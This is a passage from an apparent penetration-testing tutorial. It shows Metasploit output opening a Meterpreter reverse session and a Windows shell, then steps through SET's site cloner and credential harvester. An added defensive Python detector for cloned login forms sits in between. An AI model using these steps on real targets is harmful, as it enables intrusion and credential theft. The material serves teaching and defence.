Chapter 10
msf exploit(handler) >
[*] Sending stage (748032 bytes) to 10.10.1.102
[*] Meterpreter session 1 opened (10.10.1.112:443 -> 10.10.1.102:58412)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2819 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>
Username and Password Harvesting
In the preceding examples, the goal was to obtain access to the individual
system. Relatively new within SET is the ability to clone a website and harvest
visitors' credentials when they access the site, as we'll demonstrate using
Gmail in this next example. SET can create a clone of the Gmail website,
automatically rewrite the POST parameters of that clone so that the form posts
to the SET web server, and then redirect the user to the legitimate website
that was cloned.
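From the defender's side, the rewritten POST target described above is the detectable change in a cloned login page. The following is an added example, not code from the book or from SET: it parses a page and reports password forms that post outside the brand's own origins. The function names, the sample HTML, the origin https://login.example.com and the address 192.0.2.10 are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

class FormScanner(HTMLParser):
    """Records each <form>'s action and whether it holds a password input."""
    def __init__(self):
        super().__init__()
        self.forms = []    # entries are [action, has_password_field]
        self._open = None  # the form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._open = [attrs.get("action") or "", False]
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._open[1] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def origin(url):
    """(scheme, host, port) with the default port filled in."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    return scheme, (parts.hostname or "").lower(), parts.port or DEFAULT_PORTS.get(scheme)

def off_origin_password_forms(html, served_from, expected_origins):
    """Resolved targets of password forms that post outside expected_origins."""
    scanner = FormScanner()
    scanner.feed(html)
    allowed = {origin(o) for o in expected_origins}
    targets = [urljoin(served_from, action)
               for action, has_password in scanner.forms if has_password]
    return [t for t in targets if origin(t) not in allowed]

# Constructed sample input: a genuine login form and a clone with a rewritten action.
BRAND = ["https://login.example.com"]
GENUINE = '<form method="post" action="/signin"><input type="password" name="pw"></form>'
CLONE = ('<form action="/search"><input name="q"></form>'
         '<form method="post" action="http://192.0.2.10/">'
         '<input name="Email"><input type="password" name="Passwd"></form>')

if __name__ == "__main__":
    print(off_origin_password_forms(GENUINE, "https://login.example.com/", BRAND))
    print(off_origin_password_forms(CLONE, "http://192.0.2.10/", BRAND))
```

Because a relative action is resolved against the address the page was served from, a clone that keeps the original relative action is still reported.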
3. Credential Harvester Attack Method
Enter your choice (press enter for default): 3
[!] Website Attack Vectors [!]
2. Site Cloner
Enter number (1-4): 2
Email harvester will allow you to utilize the clone capabilities within SET
to harvest credentials or parameters from a website as well as place them into
a report.
SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: http://www.secmaniac.com
Press {return} to continue.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below: